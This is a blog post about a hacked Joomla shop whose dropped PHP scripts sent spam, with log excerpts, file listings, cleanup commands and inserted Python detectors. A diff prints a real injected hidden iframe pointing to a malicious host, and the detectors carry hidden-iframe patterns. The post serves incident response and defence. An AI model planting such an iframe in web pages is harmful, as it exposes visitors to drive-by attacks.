Interesting reading… A blog with a lot of interesting information…

7 January 2013

Mail spam sent from a web server via PHP

Category: linux — dmitriano @ 14:59

Today I found some strange files on the server:

root@gate:/home# find . -name 'statisticsIjod.php'
./beauty/www/images/stories/wlw/statisticsIjod.php
./beauty/www/images/stories/soap/statisticsIjod.php
./beauty/www/images/stories/fruit/statisticsIjod.php
./beauty/www/images/stories/statisticsIjod.php
./beauty/www/images/stories/food/statisticsIjod.php

and each copy was written one minute after the previous one (21:26, 21:27, 21:28, 21:29, 21:30), one directory after another:

root@gate:/home# ll ./beauty/www/images/stories/wlw/statisticsIjod.php
-rw------- 1 nobody beauty 6987 Dec 19 21:30 ./beauty/www/images/stories/wlw/statisticsIjod.php
root@gate:/home# ll ./beauty/www/images/stories/soap/statisticsIjod.php
-rw------- 1 nobody beauty 6987 Dec 19 21:29 ./beauty/www/images/stories/soap/statisticsIjod.php
root@gate:/home# ll ./beauty/www/images/stories/fruit/statisticsIjod.php
-rw------- 1 nobody beauty 6987 Dec 19 21:28 ./beauty/www/images/stories/fruit/statisticsIjod.php
root@gate:/home# ll ./beauty/www/images/stories/statisticsIjod.php
-rw------- 1 nobody beauty 6987 Dec 19 21:26 ./beauty/www/images/stories/statisticsIjod.php
root@gate:/home# ll ./beauty/www/images/stories/food/statisticsIjod.php
-rw------- 1 nobody beauty 6987 Dec 19 21:27 ./beauty/www/images/stories/food/statisticsIjod.php

which is odd enough.

Clearly these files were written by some PHP script running as user nobody with group beauty: nobody is the account the web server runs PHP under, not the site owner's account, so they arrived through the web application rather than through the owner's login. Judging by the contents, the script can be used to send spam.

There is no trace of it in the Nginx logs (which only proves that nobody requested it directly; a script that is merely include()d or executed by another script never shows up in the access log):

root@gate:/var/log/nginx# grep statisticsIjod beauty.access.log
root@gate:/var/log/nginx# grep statisticsIjod beauty.access.log.1

But there is a guestbook5Su.php sitting next to it:

80.55.28.69 - - [07/Jan/2013:13:55:07 +0400] "POST /images/stories/guestbook5Su.php HTTP/1.1" 200 76 "-" "Mozilla/5.0"
88.235.200.86 - - [07/Jan/2013:13:55:11 +0400] "POST /images/stories/guestbook5Su.php HTTP/1.1" 200 119 "-" "Mozilla/5.0"

Someone is constantly hitting this file from different IPs. Every request is a POST, nearly every one from a new address, all with the bare "Mozilla/5.0" User-Agent and no Referer: that is a botnet driving a dropped script, not visitors:

65.35.164.12 - - [07/Jan/2013:14:07:44 +0400] "POST /images/stories/guestbook5Su.php HTTP/1.1" 200 74 "-" "Mozilla/5.0"
2.134.254.42 - - [07/Jan/2013:14:07:45 +0400] "POST /images/stories/guestbook5Su.php HTTP/1.1" 200 82 "-" "Mozilla/5.0"
94.159.191.212 - - [07/Jan/2013:14:07:46 +0400] "POST /images/stories/guestbook5Su.php HTTP/1.1" 200 79 "-" "Mozilla/5.0"
189.149.33.174 - - [07/Jan/2013:14:10:54 +0400] "POST /images/stories/guestbook5Su.php HTTP/1.1" 200 81 "-" "Mozilla/5.0"
41.72.103.22 - - [07/Jan/2013:14:11:03 +0400] "POST /images/stories/guestbook5Su.php HTTP/1.1" 200 381 "-" "Mozilla/5.0"
92.14.211.150 - - [07/Jan/2013:14:11:03 +0400] "POST /images/stories/guestbook5Su.php HTTP/1.1" 200 47 "-" "Mozilla/5.0"
92.14.211.150 - - [07/Jan/2013:14:11:14 +0400] "POST /images/stories/guestbook5Su.php HTTP/1.1" 200 76 "-" "Mozilla/5.0"
95.56.138.120 - - [07/Jan/2013:14:12:06 +0400] "POST /images/stories/guestbook5Su.php HTTP/1.1" 200 379 "-" "Mozilla/5.0"
93.145.93.239 - - [07/Jan/2013:14:12:58 +0400] "POST /images/stories/guestbook5Su.php HTTP/1.1" 200 383 "-" "Mozilla/5.0"
94.20.154.186 - - [07/Jan/2013:14:13:03 +0400] "POST /images/stories/guestbook5Su.php HTTP/1.1" 200 86 "-" "Mozilla/5.0"
83.50.238.68 - - [07/Jan/2013:14:13:20 +0400] "POST /images/stories/guestbook5Su.php HTTP/1.1" 200 81 "-" "Mozilla/5.0"
88.184.236.194 - - [07/Jan/2013:14:13:24 +0400] "POST /images/stories/guestbook5Su.php HTTP/1.1" 200 79 "-" "Mozilla/5.0"
41.133.201.160 - - [07/Jan/2013:14:13:28 +0400] "POST /images/stories/guestbook5Su.php HTTP/1.1" 200 77 "-" "Mozilla/5.0"
196.12.228.197 - - [07/Jan/2013:14:13:50 +0400] "POST /images/stories/guestbook5Su.php HTTP/1.1" 200 381 "-" "Mozilla/5.0"

And judging by what is in /var/log/mail.log, somebody is happily sending spam through sendmail. The messages come in from localhost.localdomain [127.0.0.1], i.e. they are handed to sendmail locally, which is exactly what PHP's mail() does, and go out through the smtp.spbtlg.ru relay:

Jan  7 13:27:29 gate sm-mta[12491]: r079RPmg012489: r079RTmg012491: DSN: Service unavailable
Jan  7 13:27:29 gate sm-mta[12491]: r079RTmg012491: to=<thelma_bridges@milomag.ru>, delay=00:00:00, xdelay=00:00:00, mailer=relay, pri=30000, relay=smtp.spbtlg.ru. [213.158.0.51], dsn=2.0.0, stat=Sent (Ok: queued as 1503BC8AF9)
Jan  7 13:31:53 gate sm-mta[12532]: r079VoJI012532: from=<marylou_stanley@milomag.ru>, size=525, class=0, nrcpts=1, msgid=<10abfc1-3210c-f9@milomag.ru>, proto=ESMTP, daemon=MTA-v4, relay=localhost.localdomain [127.0.0.1]
Jan  7 13:31:56 gate sm-mta[12534]: r079VoJI012532: to=<potta2k6@hotmail.co>, delay=00:00:04, xdelay=00:00:03, mailer=relay, pri=120525, relay=smtp.spbtlg.ru. [213.158.0.51], dsn=5.1.7, stat=Service unavailable
Jan  7 13:31:56 gate sm-mta[12534]: r079VoJI012532: r079VuJI012534: DSN: Service unavailable
Jan  7 13:31:56 gate sm-mta[12534]: r079VuJI012534: to=<marylou_stanley@milomag.ru>, delay=00:00:00, xdelay=00:00:00, mailer=relay, pri=30000, relay=smtp.spbtlg.ru. [213.158.0.51], dsn=2.0.0, stat=Sent (Ok: queued as F0BDBC7A6F)
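The two log excerpts above are enough to build a small detector. The following is an added example, not code from the post: it parses nginx combined-format lines for successful POSTs to PHP scripts living under upload directories and counts the distinct source addresses and bare User-Agents per path, and it parses sendmail lines for messages handed in via localhost whose envelope sender domain is not one the host legitimately sends for. The sample lines are copied from the excerpts above, plus two constructed benign requests (10.0.0.5, 10.0.0.6) and one constructed legitimate submission from shop@beauty.example; the list of upload-only path prefixes and the local domain beauty.example are assumptions.

```python
"""Correlate web-shell POSTs in nginx access logs with mail injected through the
local sendmail.  Added example, not the post's own code."""
import re
from collections import defaultdict

NGINX_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"'
)
# Paths under which a PHP script has no business existing (assumption: Joomla layout).
UPLOAD_PREFIXES = ("/images/", "/components/com_virtuemart/shop_image/", "/cache/", "/tmp/")
PHP_SUFFIXES = (".php", ".phtml", ".php5")

SM_FROM = re.compile(r"sm-mta\[\d+\]: (?P<qid>\w+): from=<(?P<sender>[^>]*)>.*relay=(?P<relay>.+)$")
SM_TO = re.compile(r"sm-mta\[\d+\]: (?P<qid>\w+): to=<(?P<rcpt>[^>]*)>.*stat=(?P<stat>.+)$")


def find_webshell_posts(lines):
    """{path: {"hits", "ips", "generic_ua"}} for successful POSTs to PHP under upload dirs."""
    seen = defaultdict(lambda: {"hits": 0, "ips": set(), "generic_ua": 0})
    for line in lines:
        m = NGINX_LINE.match(line.rstrip("\n"))
        if not m:
            continue
        path = m["path"].split("?", 1)[0]
        if m["method"] != "POST" or not path.lower().endswith(PHP_SUFFIXES):
            continue
        if not path.startswith(UPLOAD_PREFIXES) or not m["status"].startswith("2"):
            continue
        entry = seen[path]
        entry["hits"] += 1
        entry["ips"].add(m["ip"])
        # Bots driving a dropped script send a bare or missing User-Agent.
        if m["ua"] in ("-", "", "Mozilla/5.0"):
            entry["generic_ua"] += 1
    return dict(seen)


def local_submissions(lines, local_domains):
    """Messages accepted from 127.0.0.1 (PHP mail() -> sendmail) whose envelope sender
    domain is not one this host should originate.  Bounces carry an empty sender
    (from=<>) and are skipped; their to= lines belong to a queue id we never record."""
    local = {d.lower() for d in local_domains}
    msgs = {}
    for line in lines:
        f = SM_FROM.search(line)
        if f:
            if f["sender"] and ("localhost" in f["relay"] or "[127.0.0.1]" in f["relay"]):
                domain = f["sender"].rsplit("@", 1)[-1].lower()
                if domain not in local:
                    msgs[f["qid"]] = {"qid": f["qid"], "sender": f["sender"],
                                      "recipients": [], "status": []}
            continue
        t = SM_TO.search(line)
        if t and t["qid"] in msgs:
            msgs[t["qid"]]["recipients"].append(t["rcpt"])
            msgs[t["qid"]]["status"].append(t["stat"])
    return sorted(msgs.values(), key=lambda m: m["qid"])


# Sample input: lines from the post's excerpts plus constructed benign traffic.
NGINX_SAMPLE = [
    '80.55.28.69 - - [07/Jan/2013:13:55:07 +0400] "POST /images/stories/guestbook5Su.php HTTP/1.1" 200 76 "-" "Mozilla/5.0"',
    '88.235.200.86 - - [07/Jan/2013:13:55:11 +0400] "POST /images/stories/guestbook5Su.php HTTP/1.1" 200 119 "-" "Mozilla/5.0"',
    '92.14.211.150 - - [07/Jan/2013:14:11:03 +0400] "POST /images/stories/guestbook5Su.php HTTP/1.1" 200 47 "-" "Mozilla/5.0"',
    '92.14.211.150 - - [07/Jan/2013:14:11:14 +0400] "POST /images/stories/guestbook5Su.php HTTP/1.1" 200 76 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [07/Jan/2013:14:11:20 +0400] "GET /images/stories/docs/kastorovoe-maslo.png HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/17.0"',
    '10.0.0.6 - - [07/Jan/2013:14:11:25 +0400] "POST /index.php?option=com_users&task=user.login HTTP/1.1" 303 0 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/17.0"',
]
MAIL_SAMPLE = [
    "Jan  7 13:31:53 gate sm-mta[12532]: r079VoJI012532: from=<marylou_stanley@milomag.ru>, size=525, class=0, nrcpts=1, msgid=<10abfc1-3210c-f9@milomag.ru>, proto=ESMTP, daemon=MTA-v4, relay=localhost.localdomain [127.0.0.1]",
    "Jan  7 13:31:56 gate sm-mta[12534]: r079VoJI012532: to=<potta2k6@hotmail.co>, delay=00:00:04, xdelay=00:00:03, mailer=relay, pri=120525, relay=smtp.spbtlg.ru. [213.158.0.51], dsn=5.1.7, stat=Service unavailable",
    "Jan  7 13:31:56 gate sm-mta[12534]: r079VoJI012532: r079VuJI012534: DSN: Service unavailable",
    "Jan  7 13:31:56 gate sm-mta[12534]: r079VuJI012534: to=<marylou_stanley@milomag.ru>, delay=00:00:00, xdelay=00:00:00, mailer=relay, pri=30000, relay=smtp.spbtlg.ru. [213.158.0.51], dsn=2.0.0, stat=Sent (Ok: queued as F0BDBC7A6F)",
    # constructed: a legitimate shop notification submitted the same way
    "Jan  7 13:40:00 gate sm-mta[12600]: r079e0AB012600: from=<shop@beauty.example>, size=900, class=0, nrcpts=1, msgid=<order-1@beauty.example>, proto=ESMTP, daemon=MTA-v4, relay=localhost.localdomain [127.0.0.1]",
    "Jan  7 13:40:02 gate sm-mta[12601]: r079e0AB012600: to=<customer@example.net>, delay=00:00:02, xdelay=00:00:01, mailer=relay, pri=120900, relay=smtp.spbtlg.ru. [213.158.0.51], dsn=2.0.0, stat=Sent (Ok: queued as 0000000000)",
]

if __name__ == "__main__":
    for path, info in find_webshell_posts(NGINX_SAMPLE).items():
        print(f"{path}: {info['hits']} POSTs from {len(info['ips'])} IPs, {info['generic_ua']} bare UA")
    for msg in local_submissions(MAIL_SAMPLE, {"beauty.example"}):
        print(f"{msg['qid']} {msg['sender']} -> {msg['recipients']} {msg['status']}")
```

Against the real files this is `find_webshell_posts(open('beauty.access.log'))` and `local_submissions(open('mail.log'), {'your-domain'})`. Two things it makes visible that the raw lines do not: a single path hit by many addresses with an identical bare User-Agent, and envelope sender domains the host has no reason to originate.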

There are actually more suspicious files than that:

-rw-r--r-- 1 nobody beauty  6987 Dec 27 22:00 /home/beauty/www/images/stories/guestbook5Su.php
-rwxr-xr-x 1 nobody beauty   861 Dec 19 23:30 /home/beauty/www/images/stories/index.php*
-rw------- 1 nobody beauty  6987 Dec 19 21:26 /home/beauty/www/images/stories/statisticsIjod.php
-rw-r--r-- 1 nobody beauty   113 Dec 19 10:00 /home/beauty/www/images/stories/story.php
-rw-r--r-- 1 nobody beauty 11757 Dec 27 22:00 /home/beauty/www/images/stories/WMmain.php

Let's see what changed in the filesystem over the last month:

root@gate:/home/beauty/www# find . -type f -mtime -30
./components/com_virtuemart/shop_image/product/_________________50ce299fdc14c.png
./components/com_virtuemart/shop_image/product/_________________50d3f152c1e11.png
./components/com_virtuemart/shop_image/product/resized/_________________50ce299fd6089_90x90.png
./components/com_virtuemart/shop_image/product/resized/_________________50d3f1526661a_90x90.png
./components/com_virtuemart/shop_image/JSCookTree.js
./images/stories/wlw/statisticsIjod.php
./images/stories/wlw/index.php
./images/stories/story.php
./images/stories/WMmain.php
./images/stories/soap/statisticsIjod.php
./images/stories/soap/index.php
./images/stories/.cache_ut1x50.php
./images/stories/fruit/statisticsIjod.php
./images/stories/fruit/index.php
./images/stories/a7XJ.html
./images/stories/guestbook5Su.php
./images/stories/docs/kastorovoe-maslo.png
./images/stories/docs/maslo-kakao-nerafinirovannoe.jpg
./images/stories/statisticsIjod.php
./images/stories/food/statisticsIjod.php
./images/stories/food/index.php
./images/stories/index.php
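`find -type f -mtime -30` works, but it lists every legitimately uploaded product image alongside the droppers, and it says nothing about the ownership clue from the first listing. The following added example (not the post's code) applies four narrower rules to a web root: executable code under upload/media directories, hidden PHP files, recently modified code, and code owned by the web-server uid rather than the site owner. It builds a constructed directory tree that mimics the listings above; the set of directory names treated as upload-only is an assumption based on the Joomla/VirtueMart layout in the post.

```python
"""Hunt for dropped PHP/JS in a web root.  Added example, not the post's own code."""
import os
import tempfile
import time
from pathlib import Path

PHP_EXT = {".php", ".phtml", ".php5", ".phar"}
EXEC_EXT = PHP_EXT | {".js"}
MARKUP_EXT = {".html", ".htm"}
# Directory names that should hold uploaded media only, never executable code.
# Assumption based on the Joomla/VirtueMart layout shown in the post.
UPLOAD_DIR_NAMES = {"images", "stories", "shop_image", "cache", "tmp", "uploads"}


def find_suspicious_php(root, days=30, webserver_uid=None):
    """Walk ROOT and return {relative_path: [reasons]} for files worth a look.

    Rules (each is one reason; a file may collect several):
      * executable code (.php/.js) sitting under an upload/media directory
      * hidden (dot-prefixed) PHP file
      * code or markup modified within DAYS (the post used find -mtime -30)
      * code owned by the web-server uid, i.e. written by PHP, not the site owner
    """
    root = Path(root)
    cutoff = time.time() - days * 86400
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        here = Path(dirpath)
        in_upload_dir = bool(set(here.relative_to(root).parts) & UPLOAD_DIR_NAMES)
        for name in files:
            path = here / name
            ext = path.suffix.lower()
            st = path.lstat()
            reasons = []
            if ext in EXEC_EXT and in_upload_dir:
                reasons.append("executable code inside an upload/media directory")
            if ext in PHP_EXT and name.startswith("."):
                reasons.append("hidden PHP file")
            if ext in EXEC_EXT | MARKUP_EXT and st.st_mtime > cutoff:
                reasons.append(f"modified within the last {days} days")
            if webserver_uid is not None and ext in EXEC_EXT and st.st_uid == webserver_uid:
                reasons.append("owned by the web-server uid")
            if reasons:
                hits[path.relative_to(root).as_posix()] = reasons
    return hits


def owner_uid(path):
    """uid owning PATH; handy for passing the web root owner as a reference uid."""
    return os.stat(path).st_uid


def build_demo_tree():
    """Create a constructed web root mimicking the post's layout; returns its path."""
    root = Path(tempfile.mkdtemp(prefix="webroot_"))
    recent = {
        "images/stories/statisticsIjod.php": "<?php /* dropper, constructed */ ?>",
        "images/stories/.cache_ut1x50.php": "<?php /* hidden dropper, constructed */ ?>",
        "images/stories/docs/photo.png": "constructed png placeholder",
        "components/com_virtuemart/shop_image/JSCookTree.js": "// constructed tree widget",
    }
    for rel, body in recent.items():
        p = root / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text(body)
    # A legitimate component file that has not been touched for over a year.
    old = root / "components/com_virtuemart/virtuemart.php"
    old.write_text("<?php /* legitimate component, constructed */ ?>")
    year_ago = time.time() - 400 * 86400
    os.utime(old, (year_ago, year_ago))
    return root


if __name__ == "__main__":
    demo = build_demo_tree()
    for rel, why in sorted(find_suspicious_php(demo).items()):
        print(rel, "->", "; ".join(why))
```

On a live box pass `webserver_uid=pwd.getpwnam("nobody").pw_uid` (or whatever user PHP runs as) and the ownership rule alone reproduces the first listing in this post; the recently-modified rule then catches edits to pre-existing files, which ownership cannot.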

exactly those files, plus some JSCookTree.js that was modified today. Unlike the dropped scripts it is owned by beauty, but it is group-writable (-rw-rw-r--, group beauty), and the dropped files show that the PHP process runs with group beauty, so the same process could have edited it in place:

root@gate:/home/beauty/www# ll ./components/com_virtuemart/shop_image/JSCookTree.js
-rw-rw-r-- 1 beauty beauty 21490 Jan  7 14:34 ./components/com_virtuemart/shop_image/JSCookTree.js

let's see what is inside by diffing it against the other copy of the same file:

root@gate:/home/beauty/www# find . -iname 'JSCookTree.js'
./components/com_virtuemart/shop_image/JSCookTree.js
./modules/mod_virtuemart/JSCookTree.js
root@gate:/home/beauty/www# diff ./components/com_virtuemart/shop_image/JSCookTree.js ./modules/mod_virtuemart/JSCookTree.js
860d859
< ;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://exiryji.qhigh.com/945051d6f67c98d01b760e3d07b9b.dwFS0?13" height="500" width="500"></iframe>');
\ No newline at end of file
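The diff shows the classic pattern: a single statement appended after the last line of a legitimate script (hence "No newline at end of file") that writes an iframe pushed 550px off-screen. The following added example, not the post's code, scans JavaScript for document.write()'d iframes and flags those that are both hidden and sit at the very end of the file. The sample script and the attacker.example URL are constructed placeholders, not the real injection from the diff.

```python
"""Spot document.write()'d iframes hidden off-screen.  Added example, not the post's code."""
import re

# document.write('...') or document.write("...")  (DOTALL: multi-line strings still match)
WRITE_CALL = re.compile(r"""document\.write\s*\(\s*(['"])(?P<html>.*?)\1\s*\)""", re.I | re.S)
IFRAME_SRC = re.compile(r"""<iframe[^>]*?\bsrc\s*=\s*['"]?([^'"\s>]+)""", re.I)
# Placement tricks that keep the frame out of the visitor's sight.
HIDDEN = re.compile(
    r"(?:left|top)\s*:\s*-\d+\s*px"          # pushed off-screen, as in the diff above
    r"|visibility\s*:\s*hidden"
    r"|display\s*:\s*none"
    r"|\b(?:width|height)\s*=\s*['\"]?0\b",  # zero-sized frame
    re.I,
)


def scan_js(text):
    """One dict per written iframe: its src, whether it is hidden, and whether the
    call is the last statement in the file (the usual injection point)."""
    findings = []
    for m in WRITE_CALL.finditer(text):
        html = m.group("html")
        src = IFRAME_SRC.search(html)
        if not src:
            continue
        findings.append({
            "src": src.group(1),
            "hidden": bool(HIDDEN.search(html)),
            "appended": text[m.end():].strip(" ;\r\n\t") == "",
            "offset": m.start(),
        })
    return findings


def is_injected(finding):
    """An off-screen frame tacked onto the end of the file is the post's pattern."""
    return finding["hidden"] and finding["appended"]


# Constructed file: a harmless widget script with an injection appended, no final newline.
SAMPLE_JS = (
    "function CTree(id) { this.id = id; }\n"
    "CTree.prototype.render = function () {\n"
    "  document.write('<iframe src=\"https://www.example.com/help\" width=\"300\" height=\"200\"></iframe>');\n"
    "};\n"
    ";document.write('<iframe style=\"position:fixed;top:0px;left:-550px;\" "
    "src=\"http://attacker.example/945051.dwFS0?13\" height=\"500\" width=\"500\"></iframe>');"
)

if __name__ == "__main__":
    for f in scan_js(SAMPLE_JS):
        print(("INJECTED " if is_injected(f) else "ok       ") + f["src"])
```

Diffing against a clean copy, as the post does, remains the stronger check; this is for the case where there is no second copy to diff against. A legitimate widget may also document.write an iframe, which is why a visible one is listed but not judged injected.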

To begin with, simply delete everything. Copy the files out of the web root first if you want to look at them later, and bear in mind that removing the droppers does not close whatever hole they came in through (the comment below shows more nobody-owned .php files under components/com_virtuemart, some dated after this cleanup):

rm ./components/com_virtuemart/shop_image/JSCookTree.js
rm ./images/stories/wlw/statisticsIjod.php ./images/stories/wlw/index.php
rm ./images/stories/story.php ./images/stories/WMmain.php ./images/stories/soap/statisticsIjod.php ./images/stories/soap/index.php ./images/stories/.cache_ut1x50.php ./images/stories/fruit/statisticsIjod.php ./images/stories/fruit/index.php ./images/stories/a7XJ.html ./images/stories/guestbook5Su.php ./images/stories/statisticsIjod.php ./images/stories/food/statisticsIjod.php ./images/stories/food/index.php ./images/stories/index.php

and let's remember that today is 7 January 2013 and the last spam message went out at Jan  7 14:38:44 :)

clean out the queue (http://www.cyberciti.biz/faq/linux-unix-bsd-clear-sendmail-queue/); note that rm * in mqueue also discards any legitimate mail that happens to be waiting there, so look at the queue with mailq (sendmail -bp) first:

# cd /var/spool/mqueue/
# ls
# rm *

links:

https://help.ubuntu.com/community/ClamAV
http://www.linuxquestions.org/questions/linux-newbie-8/free-anti-virus-for-ubuntu-925146/
http://sourceforge.net/projects/phpantivirus/ – this thing runs, but finds nothing

1 comment »

  1. here are some more strange files:

    ~$ ll www/components/com_virtuemart/shop_image/
    total 92
    drwxrwxr-x 6 beauty beauty 4096 Apr 12 19:30 ./
    drwxrwxr-x 5 beauty beauty 4096 Mar 3 20:56 ../
    -rw-r--r-- 1 beauty beauty 1530 Dec 13 2011 239ebaf5ed90010adb37827bf5909800.sess
    -rw-r--r-- 1 nobody beauty 1611 Jan 11 19:06 4309e0e42cbf33088ba8d725194a146c.sess
    -rw-r--r-- 1 beauty beauty 1530 Dec 13 2011 61914ae25b970cf5ebc88220f5f64eed.sess
    -rw-r--r-- 1 beauty beauty 1530 Dec 13 2011 733ffed41b5503bf962a250344f37181.sess
    -rw-rw-r-- 1 beauty beauty 49 Nov 12 2005 blank.gif
    drwxrwxr-x 3 beauty beauty 4096 Feb 26 08:22 category/
    -rw-r--r-- 1 beauty beauty 1530 Sep 29 2011 dc9a7709a9cd72691a4fbe553476e0a9.sess
    -rw-rw-r-- 1 beauty beauty 0 Jan 4 2007 index.html
    drwxrwxr-x 3 beauty beauty 49152 Apr 2 17:48 product/
    drwxrwxr-x 3 beauty beauty 4096 Feb 4 06:17 ps_image/
    drwxrwxr-x 2 beauty beauty 4096 Feb 6 05:51 vendor/

    $ ll www/components/com_virtuemart
    total 84
    drwxrwxr-x 5 beauty beauty 4096 Mar 3 20:56 ./
    drwxr-xr-x 22 beauty beauty 4096 Aug 23 2012 ../
    -rw-r--r-- 1 nobody beauty 297 Feb 1 00:28 34a44fb65e.php
    -rw-r--r-- 1 nobody beauty 297 Feb 4 06:58 aef2d85b.php
    -rw-r--r-- 1 nobody beauty 289 Dec 12 04:28 b1fdcd7.php
    -rw-r--r-- 1 nobody beauty 289 Feb 4 23:01 c0875d1.php
    -rw-r--r-- 1 beauty beauty 7678 Apr 10 2008 fetchscript.php
    drwxr-xr-x 8 beauty beauty 4096 Jun 20 2011 js/
    -rw-r--r-- 1 beauty beauty 10165 Oct 17 2011 router.php
    drwxrwxr-x 6 beauty beauty 4096 Apr 12 19:30 shop_image/
    -rw-r--r-- 1 beauty beauty 5470 Feb 16 2009 show_image_in_imgtag.php
    drwxr-xr-x 13 beauty beauty 4096 Oct 2 2010 themes/
    -rw-r--r-- 1 beauty beauty 11674 Aug 15 2011 virtuemart_parser.php
    -rw-r--r-- 1 beauty beauty 7378 Aug 15 2011 virtuemart.php

    I deleted the strange files here

    Comment by admin — 13 April 2013 @ 10:44
